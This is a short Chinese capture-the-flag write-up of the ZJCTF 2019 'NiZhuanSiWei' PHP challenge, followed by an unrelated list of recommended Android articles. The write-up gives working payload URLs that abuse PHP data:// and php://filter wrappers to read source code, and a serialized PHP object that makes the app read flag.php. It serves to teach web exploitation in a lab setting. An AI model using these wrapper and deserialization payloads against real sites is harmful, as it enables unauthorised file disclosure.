[ZJCTF 2019]NiZhuanSiWei

虽然有include函数但我们无法直接包含flag因为对file进行了过滤,又看见有反序列化的入口,只是并没有发现可利用的方法,但题目有提示所以尝试将其调出来

php伪协议写入内容

看到file_get_contents函数想到使用data协议,去封装一个流,然后保险起见include使用了filter,data:写入内容为welcome to the zjctf,&加入php伪协议来读取useless.php

payload如下:

?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php

给file变量在赋值读取flag.php

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

将前面的伪协议去掉,最终的poc是:

/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

相关推荐
w139548564223 分钟前
鸿蒙实战:报告与雷达图 ReportDao
android·华为·harmonyos·鸿蒙系统
爱笑鱼40 分钟前
Handler(二):MessageQueue 为什么不是普通队列?
android
阿巴斯甜1 小时前
Android Studio 新版 Logcat
android
监督者修1 小时前
从零构建 GIS 数据引擎:方案驱动架构的设计与实践
android·架构·kotlin
Yoke1 小时前
从零到三端:用 Kotlin Multiplatform + Compose 构建跨平台财务追踪应用
android
gxgldyh1 小时前
Android Framework源码解析(六):Launcher3 启动流程详解——AMS 如何拉起系统桌面?
android
XiaoLeisj1 小时前
HandlerThread 与 IntentService 使用及源码解析
android·handler
我命由我1234511 小时前
Android Studio - Android Studio 自定义预览尺寸
android·java·ide·java-ee·android studio·android-studio·android runtime
取个名字太难了~13 小时前
越用越便宜,越用越强大:影像 SDK 的边际成本递减与网络效应实践
android·数码相机·美颜·相机连接·demu
CHNE_TAO_EMSM15 小时前
Android studio 打开文件时自动下载源码
前端·javascript·android studio